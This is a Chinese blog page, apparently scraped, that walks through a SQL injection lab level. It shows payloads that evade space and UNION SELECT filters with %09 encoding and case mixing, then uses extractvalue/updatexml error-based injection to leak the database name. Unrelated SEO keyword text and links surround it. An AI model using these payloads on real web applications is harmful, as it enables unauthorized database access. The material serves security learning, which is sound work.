当前位置: 首页 > news >正文

网站百度流量怎么做好看的网站 你知道的2021

网站百度流量怎么做,好看的网站 你知道的2021,网站托管目的是什么,wordpress标签作用知识点&#xff1a; union select 关键字过滤 通过<> /**/进行截断处理 un<>ion sel<>ect 没效果uni/**/on sel/**/ect 被过滤了双写绕过 这关对select进行了多重过滤&#xff0c;无法进行双写绕过 大小写绕过 UNion SElect (这关可以用&am…

知识点:

  • union select 关键字过滤
    • 通过<> /**/进行截断处理
      • un<>ion  sel<>ect     没效果
      • uni/**/on sel/**/ect     被过滤了
    • 双写绕过     
      • 这关对select进行了多重过滤,无法进行双写绕过 
    • 大小写绕过
      • UNion SElect   (这关可以用,不演示了)
  • 空格过滤
    • %09 %0a %0b %0c %0d 进行绕过
    • 这关+和%20被过滤了,但是可以用上面的几种形式代替
  • 错误注入
    • extractvalue(1,concat(0x7e,database(),0x7e))
    • updatexml(1,concat(0x7e,database(),0x7e),1)
    • 最多展示32位,超过部分需要用截取函数处理

测试注入类型

构造payload:id=1'

构造payload:id=1''

测试发现是字符型注入

经过不断的测试发现空格和+被过滤了,发现%09可以代替空格绕过检测

构造payload:id=1'%09and%091='1

页面成功回显出了相关信息,说明绕过成功

页面给出了提示,联合查询关键字被过滤了,直接使用错误注入

构造payload:id=1'%09and%09exp(710)='1

页面成功回显除了exp()函数的错误信息

尝试获取数据库名

构造payload:id=1'%09and%09extractvalue(1,concat(0x7e,database(),0x7e))='1

成功获取到了数据库名;结束收工

10

http://www.yayakq.cn/news/342300/

相关文章:

  • 做整合营销的网站为什么局域网做网站
  • 怎么做国内网站吗小白学做网站买什么书
  • 长沙本地网站推广内蒙古企业网站制作
  • 网站核心词如何做视频剪辑线下培训班
  • 网站建设关键字优化自己做免费网站难吗
  • 泡沫制品技术支持东莞网站建设红酒 公司 网站建设
  • 建筑资料免费下载网站铜陵网站建设价格
  • 浙江省建设厅网站在哪里如何将微信和企业网站同步
  • 微信小程序平台设计成都网站排名 生客seo
  • 墨子学院网站建设vip课程网站是com好点还是cn
  • 商户网站建设培训平台网站
  • 网站排版设布局中国建筑装饰网型号填什么
  • 教育行业网站建设重庆网站建设排名
  • 龙南城市建设局网站国外做鞋子的网站吗
  • 泉州微信网站开发公司北京轨道交通建设公司网站
  • 手机端网站建设教程视频制作ppt的软件免费
  • 安徽金开建设集团网站微商城怎么开通视频
  • 怎么使网站降权柳州网站制作服务商
  • 网站服务器买了后怎么做做网站如何引用头部
  • 重庆市住房和城乡建设网站校园网站建设费用
  • 建站公司做的网站侵权了WordPress的欢迎页面
  • 公司做网站能够带来的好处中国互联网企业100强榜单
  • 公司网站的建站要点免费做网站手机软件
  • 现货黄金什么网站可以做直播企业网站设计的深圳公司
  • 北仑网站推广建设网站jw100
  • 网页设计制作网站首页wordpress 4.8.2下载
  • 做带后台的网站高邮企业网站建设公司哪家便宜
  • 网站推广的方式手段有哪些我的世界怎么做赞助网站
  • 淄博网站开发网泰快百度云做.net网站
  • 推销网站建设具备哪些知识WordPress更改admin